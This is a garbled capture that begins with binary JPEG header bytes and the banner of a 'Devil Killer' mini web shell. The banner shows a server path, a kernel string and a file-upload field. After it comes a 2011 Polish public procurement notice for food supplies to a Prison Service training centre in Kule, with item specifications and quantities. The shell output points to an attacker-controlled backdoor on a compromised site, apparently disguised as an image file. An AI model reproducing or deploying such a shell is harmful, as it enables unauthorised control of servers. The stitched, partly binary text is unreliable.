JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111215/333395-N-2011.html

<p class="kh_header"><b>Popów: Dostawy artykułów spożywczych.</b><br>
<b>Numer ogłoszenia: 333395 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy na potrzeby Ośrodka Szkolenia Służby Więziennej w Kulach artykuły spożywcze. Zamawiający dopuszcza możliwości składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszym ogłoszeniu  części zamówienia - zadania od 1 do 5. 
1. Zadanie nr 1 dostawy produktów zbożowych
2. Zadanie nr 2 dostawy innych artykułów spożywczych 
3. Zadanie nr 3 dostawy warzyw i owoców przetworzonych
4. Zadanie nr 4  dostawy zup i sosów w proszku 
5.Zadanie nr 5 dostawy przypraw.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada wiedze i doświadczenie do wykonania zamówiania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy, którego wzór stanowi załącznik do SIWZ.
2.Wypełniony i podpisany formularz cenowy, którego wzór stanowi załącznik do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego Ośrodek Szkolenia Słuzby Więziennej w Kulach 42-110 Popów, Kule 2, dział kwatermistrzowski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2011 godzina 13:00, miejsce: w siedzibie zamawiającego Ośrodek Szkolenia Słuzby Więziennej w Kulach 42-110 Popów, Kule 2, Pokój nr 3 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy produktów zbożowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Bułka tarta 15894000-1 Bułka tarta o barwie jasnej, sypka, bez grudek, powstała ze starcia bułki pszennej wraz ze skórką, nadająca się do   panierek, bez skłonności do przypalania się. Zapach swoisty bez obcych zapachów. Smak charakterystyczny dla suszonego pieczywa pszennego, bez obcych posmaków. Surowiec krajowy. Op. jedn. 400- 500g PN-A-74113 kg 260
2.Kasza jęczmienna 15613100-9 Kasza jęczmienna średnia. Op. jedn. 1 kg PN-87 A-74203 kg	200
3. Kasza manna 15613100-9	Barwa biała z odcieniem żółtym. Zapach swoisty. Op. jedn. 1 kg PN-88 A-74036 kg 100
4. Makaron gruby 15851110-2 Makaron  jajeczny  kolanka, świderki, muszelki, rurki .  Makaron typu Lubella lub Malma lub równoważne Produkowany z świeżych jaj i  najwyższej jakości mąki , dzięki której makaron jest odpowiednio twardy i doskonale sprężysty, a dzięki odpowiedniemu procesowi suszenia nie skleja się  i zachowuje naturalny zapach, złocisty kolor . Op. jedn. 250-500g. PN-A-74131 kg 250 5 Makaron nitki 15851110-2	Makaron  jajeczny nitki. Skład: mąka pszenna, świeże jaja, woda, . Zawartość tłuszczu nie mniej niż 1,6 %. Typu Wręczycki  lub równoważne . Op. jedn. 250-500g PN-A-74131	kg 100
6. Mąka pszenna 15612100-2	Mąka Poznańska lub równoważne Typ 500. Gluten nie mniej niż 27 % Op. jedn. 1 kg  PN-A-74022 kg	500
7. Mąka ziemniaczana 15310000-4	Skrobia ziemniaczana  superior. Op. jedn. 1 kg PN-93/A-74710 kg 120
8. Płatki czekoladowe 15894000-1	Zbożowe muszelki o smaku czekoladowym. Skład: mąka pszenna nie mniej niż 62 %, cukier, glukoza, kakao,  tłuszcz palmowy. Op. Jedn. 250-300g PN-A-74205:1997	kg 40
9. Płatki kukurydziane 15894000-1	Płatki kukurydziane. Skład: mąka kukurydziana  nie mniej niż 91,7%  Op. jedn. 250-300g. PN-A-74205:1997 kg 60
10. Płatki z miodem 15894000-1	Pierścionki miodowe. Skład: mąka owsiana, mąka kukurydziana, mąka pszenna, skrobia kukurydziana, cukier, sól, mleko w proszku, miód. PN-A-74205:1997 kg 40
11. Ryż biały 15611000-4	Ryż długoziarnisty. Op. Jedn. 1 kg PN-A-74220	kg 300
12. Groch połówki 15331133-8 Op.jedn.400g; PN-73 A-74600 kg 150
13. Fasola biała Jaś 15331131-4 Surowiec krajowy. Op. jedn. 400g; PN-75/R-65031 kg 150; 14. Kasza gryczana 15613100-9 Nasiona gryki. Surowiec krajowy. Op. jedn. 400g . PN-76 A74204 kg 100, 15. Makaron lasagne 15851230-9 Płatki makaronu Lasagne nie wymagające gotowania. Op. jedn. 250g kg 70; 
16. Zacierki 15851120-5 Makaron jajeczny zacierka. Skład: mąka pszenna, woda, jaja  nie mniej niż 9% (2 jaja 1 kg mąki). Op. jedn. 250 -500g PN-A-74131 kg 40;
17. Groszek ptysiowy 15871200-6 Op. jedn. 1 kg Groszek ptysiowy Składniki: mąka pszenna, tłuszcz roślinny, sól, jaja w proszku, mleko odtłuszczone w proszku, drożdże.	kg 30; 18. Grzanki 15894000-1 Op.  jedn. 05-1kg. Grzanki ziołowo-czosnkowe. Składniki: chleb pszenny ( mąka pszenna, tłuszcz roślinny,sól, drożdże), tłuszcz roślinny, aromaty kg	30; 19. Makaron ryżowy 15851100-9 Makaron ryżowy wyprodukowany z ryżu o podłużnym kształcie tuby z ukośnymi końcami. Op.250-500g Skład: mąka ryżowa; PN-A-74131.	kg 40; 20. Płatki - musli
15894000-1 Płatki zbożowe połączone z dużymi kawałkami owoców, nie zawierające sztucznych konserwantów i barwników. Op. jedn. 250-300g. kg	20..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy innych artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Herbata expresowa 15863000-5 Herbata  expresowa - torebki w kopertkach i ze sznureczkiem Typu Lipton , Dilma lub równoważne . Op. Podst.2g Op. Zbiorcze 50g, 100g, 200g.  kg 130; 2.	Napój kakaowy 15841000-5	Kakao rozpuszczalne o mocno czekoladowym smaku z witaminami i składnikami mineralnymi. Op.jedn.300g. PN-A 88113 kg 20; 3.Kawa naturalna 15861000-1 Kawa naturalna 100% pakowana próżniowo, mielona. Op. jedn. 250g PN93 A-76100 kg 15 4. Kawa rozpuszczalna
15861000-1 Kawa rozpuszczalna naturalna 100%, aglomerowana. Op. jedn.100g, 50g, Typu Tchibo Family classic  lub równoważna ;  PN-93 A-76100 kg 35
5. Ketchup 15871230-5	Ketchup o smaku łagodnym. Op. jedn. 400-500g. Skład: koncentrat pomidorowy  nie mniej niż 37%, woda, cukier, ocet, skrobia modyfikowana, sól,  Typu  Tortex lub równoważny . PN-A-86951	kg 260
6. Cukier 15831200-4	Cukier biały. Op.  jedn. 1 kg ;PN-A-74850	kg 1500
7. Miód 15831600-8 Miód pszczeli nektarowy wielokwiatowy NK. Op.jedn.25g	kg 250
8. Krem o smaku czekoladowym 15894000-1	Krem o smaku czekoladowym z kawałkami orzechów nutella lub równoważny. Skład: cukier, olej roślinny, orzechy laskowe nie mniej niż 13%, odtłuszczone słone 7,4%, odtłuszczone mleko w proszku . Op jedn. 200-250g. kg 250
9. Majonez dekoracyjny 15871273-8	Majonez dekoracyjny. Składniki: olej roślinny, żółtko jaja nie mniej niż 6,0%, ocet, musztarda (woda, gorczyca, ocet, sól, cukier).  Typu Winiary Op. jedn. 400-500ml, PN-A 86950  300l
10. Orzechy włoskie łuskane 15842400-6	Surowiec krajowy Op. jedn. 100g PN-A-78601 kg 20
11. Żurek w płynie
15891100-2 Op. jedn. butelka 0,5 l	160 l
12. Ocet winny 15871120-1	Ocet winny z białego wina o kwasowości nie mniej niż  5%.Op jedn. Butelka 200-750ml. 5l
13. Musztarda delikatesowa stołowa 15871250-1 Op.jedn.180-250g. Masa netto  nie mniej niż 175 g. Skład: woda, gorczyca, ocet, sól;  PN-A-86964;2002	kg 160
14. Olej roślinny popularny 15411100-3	Olej słonecznikowy zastosowania: do smażenia, pieczenia, sosów, sałatek, surówek. Skład: Mieszanka słoneczników olejów słonecznik: słonecznikowy oraz sojowego i lub słonecznikowego. Op. jedn. 0,9 - 1 l	500l
15. Oliwa z oliwek 15421130-1	Op. jedn. 05 - 1 l	20l
16. Śliwki suszone kalifornijskie 
15332410-1	Śliwki suszone bez pestek półsuche konserwowane kwasem sorbowym. Op jedn 150 - 500g PN-A-75201 kg 25
17. Rodzynki
15332510-1	Zdrowe, całe, nieuszkodzone, owalne, spłaszczone jagody o pomarszczonej powierzchni, średniej wielkości o brązowej barwie, właściwym zapachu charakterystycznym dla suszonych winogron bez zapachów obcych. Smak słodki, z charakterystycznym posmakiem, bez posmaków zgorzknienia, fermentacji i innych obcych. Typu  Królewskie lub równoważne . Masa netto 150g. PN-A-75201 kg 20
18. Wafelek w czekoladzie 15820000-2	Wafelek w czekoladzie  Prince-Polo lub równoważny w op.20-25g;    PN-A-88114:1999	szt	3500
19. Czekolada mleczna
15842100-3 Op. jedn. 100g. Skład: cukier, tłuszcz kakaowy, miazga kakaowa, mleko w proszku pełne, mleko w proszku odtłuszczone, serwatka w proszku, tłuszcz roślinny, PN-A-88114:1999	szt 2000
20. Paluszki solone 15820000-2	Paluszki solone w op.70g; PN-A-88109:1998 szt	50
21. Czekolada do fontann 15842100-3	Czekolada mleczna Callebaut.  Masa kakaowa nie mniej niż 37 % cukier, tłuszcz kakaowy, mleko pełne w proszku, miazga kakaowe, emulgator: lecytyna sojowa, aromat naturalny wanilia. Op. jedn.  do 2,5 kg 10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.86.30.00-5, 15.84.10.00-5, 15.86.10.00-1, 15.87.12.30-5, 15.83.12.00-4, 15.83.16.00-8, 15.89.40.00-1, 15.87.12.73-8, 15.84.24.00-6, 15.89.11.00-2, 15.87.11.20-1, 15.87.12.50-1, 15.41.11.00-3, 15.42.11.39-1, 15.33.24.10-1, 15.33.25.10-1, 15.82.00.00-2, 15.84.21.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy warzyw i owoców przetworzonych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ananas w syropie 15332100-5	Ananas plastry w lekkim syropie. Skład: ananas, woda, cukier. Op. jedn. 560-600g. Zawart. po odcieku nie mniej niż 340g. PN-A-77610 kg 150
2. Brzoskwinie w syropie      15332100-5 Brzoskwinie w lekkim syropie. Skład: brzoskwinie, woda, syrop glukozowo- fruktozowy, cukier, . Op. jedn. 800-900g , po odcieku nie mniej niż 470g. PN-A-77610 kg 60
3. Groszek konserwowy 15331462-3	Groch konserwowy zielony. Skład: woda, groch suchy,sól. Op jedn 400 - 410 g. Po odcieku nie mniej niż 200g. Typu Pudliszki . PN-76 A-77803 kg 200
4. Koncentrat buraczany 15331110-1	Koncentrat barszczu czerwonego . Skład: woda, zagęszczony sok z buraków ćwikłowych nie mniej niż 12%, cukier, sól, przyprawy. Produkt pasteryzowany. Op jedn 330 - 400ml. l 20
5. Koncentrat pomidorowy 15331427-6 Koncentrat pomid.30%  wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, bez konserwantów. Typu  Pudliszki ,  Dawtona   lub równoważny. Za równoważny uważa się koncentrat gęsty nie zmieniający swojej barwy i smaku . Op.  jedn 180-500g. PN-A- 77807 kg 250
6. Kukurydza konserwowa 15331470-2	Kukurydza konserwowa typu  Pudliszk lub równoważny i. Skład: kukurydza - ziarno, woda, cukier, sól. Op jedn. 400-500g, po odcieku nie mniej niż 220g. PN-A-77807 kg 180
7. Ogórek kiszony 15331470-2 Op.  jedn.  folia 400-1200g, po odcieku nie mniej niż 850g. Skład: ogórki, naturalna zalewa, przyprawy PN 72 A-77701. kg 700
8. Ogórek konserwowy 15331500-2	Skład: ogórki, woda, ocet spirytusowy,  cukier, sól, przyprawy aromatyczno - smakowe. Op. jedn. 900ml. Masa netto nie mniej niż 870g, po odcieku nie mniej niż 450g PN/A-77801.  kg 700
9. Papryka konserwowa 15331136-9	Skład: Papryka słodka, zalewa octowa, przyprawy. Op jedn. 900ml. Masa netto 870g. Po odcieku nie mniej niż 350g. PN-A-77806 kg	500
10. Pieczarki marynowane 15331500-2	Skład: pieczarki całe, cebula, marchew, woda, ocet, cukier, sól, przyprawy smakowe . Produkt pasteryzowany. Op  jedn 880g. Masa po odcieku 550g. PN-A-78503 kg 20
11. Seler konserwowy łagodny    15331110-1	Seler typu  Wyborny  lub równoważny . Sał. warzywna. Skład: seler, woda, ocet, cukier, sól. Op. jedn.  370 ml. Masa netto 320g, po odcieku nie mniej niż 160g. PN-A-77750.	kg 150
12. Dżem niskosłodzony 15332290-3	Dżem o różnych smakach, z kawałkami owoców, Skład: owoce, cukier, substancja żelująca. Łączna zawartość cukru: nie mniej niż 36g na 100g produktu. Op. jedn. 300-400g PN-A-86964	kg 100
13. Dżem wysokosłodzony 15332290-3 Op. jedn. 25 g Skład: cukier, syrop glukozowy, owoce, substancja zagęszczająca,  Otrzymane z 35g owoców na 100g wyrobu gotowego. Łączna zawartość cukru nie mniej niż 63g na 100g wyrobu gotowego. PN-A-77609 kg 270
14. Żurawina do mięsa 15300000-1	Żurawina do mięs i serów niskosłodzona typu Łowicz  lub równoważna. Skład: owoce żurawiny, cukier, substancja żelująca. Łączna zawartość cukru nie mniej niż 44g cukru na 100g produktu. Op. jedn. 250-300g. kg	30
15. Kapusta kiszona 15331461-6 Op.  jedn. folia 900-1100g. Skład: kapusta, marchew, przyprawy. Po odcieku nie mniej niż 850g. PN-72 A 77700 kg 1000
16. Chrzan tarty 15331461-6 Skład: korzeń chrzanu nie mniej niż 51%, woda, proszek jajeczny, mleko w proszku, olej roślinny, ocet spirytusowy, cukier, sól,  Op. jedn. 180g. Typu  Łowicki lub równoważny.      PN-A77806 kg 35
17. Fasola konserwowa czerwona  15331461-6	Skład: fasola czerwona - ziarno, woda, sól, op. jedn. 400-500g. Po odcieku nie mniej niż 200g. Typu  Kwidzyn  PN-A-77802	kg 60
18. Minikolby kukurydzy 15331500-2	Op. jedn. 300-400g, po odcieku nie mniej niż 200g. kg	20
19. Pieczarki krojone 15331135-2	Pieczarki krojone w zalewie słonej. Skład: pieczarki krojone, woda, sól, kwasek cytrynowy. Produkt pasteryzowany. Masa netto 800g. Masa po odcieku  nie mniej niż 550g. PN-92/A-78503	kg 100
